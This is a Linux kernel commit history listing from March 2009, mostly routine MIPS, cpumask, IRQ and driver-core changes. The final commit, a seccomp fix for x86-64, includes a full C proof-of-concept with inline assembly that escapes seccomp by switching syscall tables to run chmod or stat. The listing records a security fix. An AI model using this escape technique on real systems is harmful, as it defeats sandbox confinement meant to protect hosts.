Commit Graph

2515 Commits

Author SHA1 Message Date
Linus Torvalds d17abcd541 Merge git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask
* git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask:
  oprofile: Thou shalt not call __exit functions from __init functions
  cpumask: remove the now-obsoleted pcibus_to_cpumask(): generic
  cpumask: remove cpumask_t from core
  cpumask: convert rcutorture.c
  cpumask: use new cpumask_ functions in core code.
  cpumask: remove references to struct irqaction's mask field.
  cpumask: use mm_cpumask() wrapper: kernel/fork.c
  cpumask: use set_cpu_active in init/main.c
  cpumask: remove node_to_first_cpu
  cpumask: fix seq_bitmap_*() functions.
  cpumask: remove dangerous CPU_MASK_ALL_PTR, &CPU_MASK_ALL
2009-03-30 18:00:26 -07:00
Manuel Lauss 91e8a30e90 MIPS: Alchemy: PB1200: use SMC91X platform data.
Add platform data for the smc91x on the PB1200/DB1200, and remove the
now unused AU1X00 entry in smc91x.h.

Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
2009-03-30 14:49:46 +02:00
Manuel Lauss 2f794d099d MIPS: Alchemy: MIPS hazard workarounds are not required.
The Alchemy manuals state:

"All pipeline hazards and dependencies are enforced by hardware interlocks
 so that any sequence of instructions is guaranteed to execute correctly.
 Therefore, it is not necessary to pad legacy MIPS hazards (such as
 load delay slots and coprocessor accesses) with NOPs."

Run-tested on Au12x0, without any ill effects.

Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:46 +02:00
Manuel Lauss 32647e0c1f MIPS: Alchemy: provide cpu feature overrides.
Add cpu feature override constants tailored for all Alchemy variants
currently in existence.

Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>

 create mode 100644 arch/mips/include/asm/mach-au1x00/cpu-feature-overrides.h
2009-03-30 14:49:46 +02:00
Manuel Lauss 270717a8a0 MIPS: Alchemy: unify CPU model constants.
This patch removes the various CPU_AU1??? model constants in favor of
a single CPU_ALCHEMY one.

All currently existing Alchemy models are identical in terms of cpu
core and cache size/organization.  The parts of the mips kernel which
need to know the exact CPU revision extract it from the c0_prid register
already; and finally nothing else in-tree depends on those any more.

Should a new variant with slightly different "company options" and/or
"processor revision" bits in c0_prid appear, it will be supported
immediately (minus an exact model string in cpuinfo).

Signed-off-by: Manuel Lauss <mano@roarinelk.homelinux.net>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:45 +02:00
Dmitri Vorobiev 76544504ae MIPS: Make a needlessly global symbol static in arch/mips/kernel/smp.c
The variable cpu_callin_map is needlessly defined global, so let's
make it static now.

Build-tested using malta_defconfig.

Signed-off-by: Dmitri Vorobiev <dmitri.vorobiev@movial.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:45 +02:00
Dmitri Vorobiev 1451a395a8 MIPS: Fix global namespace pollution in arch/mips/kernel/smp-up.c
The following symbols in arch/mips/kernel/smp-up.c are needlessly
defined global:

up_send_ipi_single()
up_init_secondary()
up_smp_finish()
up_cpus_done()
up_boot_secondary()
up_smp_setup()
up_prepare_cpus()

This patch makes the symbols static.

Build-tested using malta_defconfig.

Signed-off-by: Dmitri Vorobiev <dmitri.vorobiev@movial.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:45 +02:00
Dmitri Vorobiev d0cdfe2423 MIPS: Malta: make a needlessly global integer variable static
The variable `mips_revision_corid' is needlessly defined global in
arch/mips/mti-malta/malta-init.c, and this patch makes it static.

Build-tested with malta_defconfig.

Signed-off-by: Dmitri Vorobiev <dmitri.vorobiev@movial.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:45 +02:00
Ralf Baechle b72b7092f8 MIPS: Use BUG_ON() where possible.
Based on original patch by Stoyan Gaydarov <stoyboyker@gmail.com> which
missed a few places.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:44 +02:00
Thomas Gleixner ae03550500 MIPS: Convert obsolete irq_desc_t to struct irq_desc
Impact: cleanup

Convert the last remaining users to struct irq_desc.

Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:44 +02:00
Ralf Baechle c87e09096d MIPS: Enable GENERIC_HARDIRQS_NO__DO_IRQ for all platforms
__do_IRQ() is deprecated and will go away.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:44 +02:00
Shinya Kuribayashi 3e168ae286 MIPS: EMMA2RH: Set UART mapbase
Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:43 +02:00
Shinya Kuribayashi ae3c1d3771 MIPS: EMMA2RH: Use set_irq_chip_and_handler_name
Fix two remaining set_irq_chip_and_handler() users which are encourated
to migrate to set_irq_chip_and_handler_name().

Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:43 +02:00
Shinya Kuribayashi 8da55bb258 MIPS: EMMA2RH: Use handle_edge_irq() handler for GPIO interrupts
EMMA's GPIO interrupts are latched by GPIO interrupt status register.
In this case, we're encouraged to use handle_edge_irq() handler.

The following changes are made along with replacing set_irq_chip() with
set_irq_chip_and_handler_name(,,handle_edge_irq,"edge"):

* Fix emma2rh_gpio_irq_ack not to disable interrupts

  With handle_edge_irq(), we're not expected to disable interrupts
  when chip->ack is served, so fix it accordingly.  We also add a new
  emma2rh_gpio_irq_mask_ack() for chip->mask_ack operation, instead.

* Remove emma2rh_gpio_irq_end(), as chip->end is no longer served.

Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:43 +02:00
Shinya Kuribayashi fb2826b7f6 MIPS: Mark Eins: Fix cascading interrupt dispatcher
* Fix mis-calculated IRQ bitshift on cascading interrupts
* Prevent cascading interrupt from being processed afterward

Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:42 +02:00
Florian Fainelli 47c969ee54 MIPS: Au1000: convert to using gpiolib
This patch converts the GPIO board code to use gpiolib.

Signed-off-by: Florian Fainelli <florian@openwrt.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:42 +02:00
Ralf Baechle 12e22e8e60 MIPS: Stop using <asm-generic/int-l64.h>.
This fixes a few warnings - and triggers a few new ones which the rest of
this patch fixes.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:41 +02:00
Ralf Baechle 2da0ba2d27 MIPS: Cavium: Add -Werror
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:41 +02:00
Ralf Baechle 59968d3bb9 MIPS: Makefile: Add simple make install target.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:40 +02:00
Ralf Baechle d6c178e969 MIPS: Compat: Zero upper 32-bit of offset_high and offset_low.
Through sys_llseek() arguably should do exactly that it doesn't which
means llseek(2) will fail for o32 processes if offset_low has bit 31 set.

As suggested by Heiko Carstens.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:40 +02:00
David Daney 0e6826c73c MIPS: __raw_spin_lock() may spin forever on ticket wrap.
If the lock is not acquired and has to spin *and* the second attempt
to acquire the lock fails, the delay time is not masked by the ticket
range mask.  If the ticket number wraps around to zero, the result is
that the lock sampling delay is essentially infinite (due to casting
-1 to an unsigned int).

The fix: Always mask the difference between my_ticket and the current
ticket value before calculating the delay.

Signed-off-by: David Daney <ddaney@caviumnetworks.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-30 14:49:39 +02:00
Ralf Baechle f5fd02a33e MIPS: Forward declare struct task_struct to avoid potencial warning. 2009-03-30 14:49:39 +02:00
Rusty Russell 1a8a51004a cpumask: remove references to struct irqaction's mask field.
Impact: cleanup

It's unused, since about 1995.  So remove all initialization of it in
preparation for actually removing the field.

Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Acked-by: Thomas Gleixner <tglx@linutronix.de>
2009-03-30 22:05:14 +10:30
Rusty Russell 0451fb2ebc cpumask: remove node_to_first_cpu
Everyone defines it, and only one person uses it
(arch/mips/sgi-ip27/ip27-nmi.c).  So just open code it there.

Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Cc: linux-mips@linux-mips.org
2009-03-30 22:05:12 +10:30
Ingo Molnar 82268da1b1 Merge branch 'linus' into percpu-cpumask-x86-for-linus-2
Conflicts:
	arch/sparc/kernel/time_64.c
	drivers/gpu/drm/drm_proc.c

Manual merge to resolve build warning due to phys_addr_t type change
on x86:

	drivers/gpu/drm/drm_info.c

Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-28 04:26:01 +01:00
Linus Torvalds 3ae5080f4c Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs-2.6
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs-2.6: (37 commits)
  fs: avoid I_NEW inodes
  Merge code for single and multiple-instance mounts
  Remove get_init_pts_sb()
  Move common mknod_ptmx() calls into caller
  Parse mount options just once and copy them to super block
  Unroll essentials of do_remount_sb() into devpts
  vfs: simple_set_mnt() should return void
  fs: move bdev code out of buffer.c
  constify dentry_operations: rest
  constify dentry_operations: configfs
  constify dentry_operations: sysfs
  constify dentry_operations: JFS
  constify dentry_operations: OCFS2
  constify dentry_operations: GFS2
  constify dentry_operations: FAT
  constify dentry_operations: FUSE
  constify dentry_operations: procfs
  constify dentry_operations: ecryptfs
  constify dentry_operations: CIFS
  constify dentry_operations: AFS
  ...
2009-03-27 16:23:12 -07:00
Christoph Hellwig 2b1c6bd77d generic compat_sys_ustat
Due to a different size of ino_t ustat needs a compat handler, but
currently only x86 and mips provide one.  Add a generic compat_sys_ustat
and switch all architectures over to it.  Instead of doing various
user copy hacks compat_sys_ustat just reimplements sys_ustat as
it's trivial.  This was suggested by Arnd Bergmann.

Found by Eric Sandeen when running xfstests/017 on ppc64, which causes
stack smashing warnings on RHEL/Fedora due to the too large amount of
data writen by the syscall.

Signed-off-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2009-03-27 14:43:57 -04:00
Ingo Molnar 6e15cf0486 Merge branch 'core/percpu' into percpu-cpumask-x86-for-linus-2
Conflicts:
	arch/parisc/kernel/irq.c
	arch/x86/include/asm/fixmap_64.h
	arch/x86/include/asm/setup.h
	kernel/irq/handle.c

Semantic merge:
        arch/x86/include/asm/fixmap.h

Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-27 17:28:43 +01:00
Linus Torvalds ba1eb95cf3 Merge branch 'header-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip
* 'header-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: (50 commits)
  x86: headers cleanup - setup.h
  emu101k1.h: fix duplicate include of <linux/types.h>
  compiler-gcc4: conditionalize #error on __KERNEL__
  remove __KERNEL_STRICT_NAMES
  make netfilter use strict integer types
  make drm headers use strict integer types
  make MTD headers use strict integer types
  make most exported headers use strict integer types
  make exported headers use strict posix types
  unconditionally include asm/types.h from linux/types.h
  make linux/types.h as assembly safe
  Neither asm/types.h nor linux/types.h is required for arch/ia64/include/asm/fpu.h
  headers_check fix cleanup: linux/reiserfs_fs.h
  headers_check fix cleanup: linux/nubus.h
  headers_check fix cleanup: linux/coda_psdev.h
  headers_check fix: x86, setup.h
  headers_check fix: x86, prctl.h
  headers_check fix: linux/reinserfs_fs.h
  headers_check fix: linux/socket.h
  headers_check fix: linux/nubus.h
  ...

Manually fix trivial conflicts in:
	include/linux/netfilter/xt_limit.h
	include/linux/netfilter/xt_statistic.h
2009-03-26 16:11:41 -07:00
Linus Torvalds a8416961d3 Merge branch 'irq-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip
* 'irq-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: (32 commits)
  x86: disable __do_IRQ support
  sparseirq, powerpc/cell: fix unused variable warning in interrupt.c
  genirq: deprecate obsolete typedefs and defines
  genirq: deprecate __do_IRQ
  genirq: add doc to struct irqaction
  genirq: use kzalloc instead of explicit zero initialization
  genirq: make irqreturn_t an enum
  genirq: remove redundant if condition
  genirq: remove unused hw_irq_controller typedef
  irq: export remove_irq() and setup_irq() symbols
  irq: match remove_irq() args with setup_irq()
  irq: add remove_irq() for freeing of setup_irq() irqs
  genirq: assert that irq handlers are indeed running in hardirq context
  irq: name 'p' variables a bit better
  irq: further clean up the free_irq() code flow
  irq: refactor and clean up the free_irq() code flow
  irq: clean up manage.c
  irq: use GFP_KERNEL for action allocation in request_irq()
  kernel/irq: fix sparse warning: make symbol static
  irq: optimize init_kstat_irqs/init_copy_kstat_irqs
  ...
2009-03-26 16:06:50 -07:00
David S. Miller 08abe18af1 Merge branch 'master' of /home/davem/src/GIT/linux-2.6/
Conflicts:
	drivers/net/wimax/i2400m/usb-notif.c
2009-03-26 15:23:24 -07:00
Linus Torvalds 0c93ea4064 Merge git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/driver-core-2.6
* git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/driver-core-2.6: (61 commits)
  Dynamic debug: fix pr_fmt() build error
  Dynamic debug: allow simple quoting of words
  dynamic debug: update docs
  dynamic debug: combine dprintk and dynamic printk
  sysfs: fix some bin_vm_ops errors
  kobject: don't block for each kobject_uevent
  sysfs: only allow one scheduled removal callback per kobj
  Driver core: Fix device_move() vs. dpm list ordering, v2
  Driver core: some cleanup on drivers/base/sys.c
  Driver core: implement uevent suppress in kobject
  vcs: hook sysfs devices into object lifetime instead of "binding"
  driver core: fix passing platform_data
  driver core: move platform_data into platform_device
  sysfs: don't block indefinitely for unmapped files.
  driver core: move knode_bus into private structure
  driver core: move knode_driver into private structure
  driver core: move klist_children into private structure
  driver core: create a private portion of struct device
  driver core: remove polling for driver_probe_done(v5)
  sysfs: reference sysfs_dirent from sysfs inodes
  ...

Fixed conflicts in drivers/sh/maple/maple.c manually
2009-03-26 11:17:04 -07:00
Ingo Molnar 5a54bd1307 Merge commit 'v2.6.29' into core/header-fixes 2009-03-26 18:29:40 +01:00
Ming Lei 7a192ec334 platform driver: fix incorrect use of 'platform_bus_type' with 'struct device_driver'
This patch fixes the bug reported in
	http://bugzilla.kernel.org/show_bug.cgi?id=11681.

"Lots of device drivers register a 'struct device_driver' with
the '.bus' member set to '&platform_bus_type'. This is wrong,
since the platform_bus functions expect the 'struct device_driver'
to be wrapped up in a 'struct platform_driver' which provides
some additional callbacks (like suspend_late, resume_early).
The effect may be that platform_suspend_late() uses bogus data
outside the device_driver struct as a pointer pointer to the
device driver's suspend_late() function or other hard to
reproduce failures."(Lothar Wassmann)

Signed-off-by: Ming Lei <tom.leiming@gmail.com>
Acked-by: Henrique de Moraes Holschuh <hmh@hmh.eng.br>
Acked-by: David Brownell <dbrownell@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-24 16:38:25 -07:00
Chris Dearman 9fb4c2b9e0 MIPS: R2: Fix problem with code that incorrectly modifies ebase.
Commit 566f74f6b2 had a change that
incorrectly modified ebase. This backs out the lines that modified
ebase.
In addition, the ebase exception vector is now allocated with correct
alignment and the ebase register updated according to the architecture
specification.

Based on original patch by David VomLehn <dvomlehn@cisco.com>.

Signed-off-by: David VomLehn <dvomlehn@cisco.com>
Signed-off-by: Chris Dearman <chris@mips.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-23 23:38:05 +01:00
Ralf Baechle 89e18eb331 MIPS: Change {set,clear,change}_c0_<foo> to return old value.
This is more standard and useful and need for the following fix to work
correctly.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-23 23:38:05 +01:00
Huang Weiyi 5484879c0a MIPS: compat: Remove duplicated #include
Remove duplicated #include in arch/mips/kernel/linux32.c.

Signed-off-by: Huang Weiyi <weiyi.huang@gmail.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-23 23:38:05 +01:00
Shinya Kuribayashi 5864810bc5 MIPS: VR5500: Enable prefetch
Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-23 23:38:04 +01:00
Jan Nikitenko d700119836 MIPS: Fix oops in dma_unmap_page on not coherent mips platforms
dma_cache_wback_inv() expects virtual address, but physical was provided
due to translation via plat_dma_addr_to_phys().
If replaced with dma_addr_to_virt(), page fault oops from dma_unmap_page()
is gone on au1550 platform.

Signed-off-by: Jan Nikitenko <jan.nikitenko@gmail.com>
Acked-by: Atsushi Nemoto <anemo@mba.ocn.ne.jp>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-23 23:38:04 +01:00
Ingo Molnar edb35028e4 Merge branches 'irq/genirq' and 'linus' into irq/core 2009-03-16 09:20:13 +01:00
Ralf Baechle a83860c2da MIPS: Mark Eins: Fix configuration.
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-13 23:08:00 +01:00
Zhang Le 3b289d6e35 MIPS: Fix TIF_32BIT undefined problem when seccomp is disabled
Signed-off-by: Zhang Le <r0bertz@gentoo.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-13 23:07:59 +01:00
Ralf Baechle 0a7c808fcc MIPS: IP27: Enable RAID5 module
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-11 21:11:07 +01:00
Atsushi Nemoto dc58f81346 MIPS: TXx9: update defconfigs
Enable following features:
* MTD (PHYSMAP)
* LED (LEDS_GPIO)
* RBTX4939
* 7SEGLED
* IDE (IDE_TX4938, IDE_TX4939)
* SMC91X
* RTC_DRV_TX4939

Signed-off-by: Atsushi Nemoto <anemo@mba.ocn.ne.jp>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-11 21:11:07 +01:00
Shinya Kuribayashi a644b2774d MIPS: NEC VR5500 processor support fixup
Current VR5500 processor support lacks of some functions which are
expected to be configured/synthesized on arch initialization.

Here're some VR5500A spec notes:

* All execution hazards are handled in hardware.

* Once VR5500A stops the operation of the pipeline by WAIT instruction,
  it could return from the standby mode only when either a reset, NMI
  request, or all enabled interrupts is/are detected.  In other words,
  if interrupts are disabled by Status.IE=0, it keeps in standby mode
  even when interrupts are internally asserted.

  Notes on WAIT: The operation of the processor is undefined if WAIT
  insn is in the branch delay slot.  The operation is also undefined
  if WAIT insn is executed when Status.EXL and Status.ERL are set to 1.

* VR5500A core only implements the Load prefetch.

With these changes, it boots fine.

Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-11 21:11:07 +01:00
Xiaotian Feng c189846ecf MIPS: Fix build of non-CONFIG_SYSVIPC version of sys_32_ipc
Signed-off-by: Xiaotian Feng <xiaotian.feng@windriver.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
2009-03-11 21:11:07 +01:00
Ralf Baechle 4302e5d53b MIPS: compat: Implement is_compat_task.
This is a build fix required after "x86-64: seccomp: fix 32/64 syscall
hole" (commit 5b1017404a).  MIPS doesn't
have the issue that was fixed for x86-64 by that patch.

This also doesn't solve the N32 issue which is that N32 seccomp processes
will be treated as non-compat processes thus only have access to N64
syscalls.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-08 09:59:39 -07:00
David S. Miller 508827ff0a Merge branch 'master' of master.kernel.org:/pub/scm/linux/kernel/git/davem/net-2.6
Conflicts:
	drivers/net/tokenring/tmspci.c
	drivers/net/ucc_geth_mii.c
2009-03-05 02:06:47 -08:00
Ingo Molnar 8b0e5860cb Merge branches 'x86/apic', 'x86/cpu', 'x86/fixmap', 'x86/mm', 'x86/sched', 'x86/setup-lzma', 'x86/signal' and 'x86/urgent' into x86/core 2009-03-04 02:22:31 +01:00
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00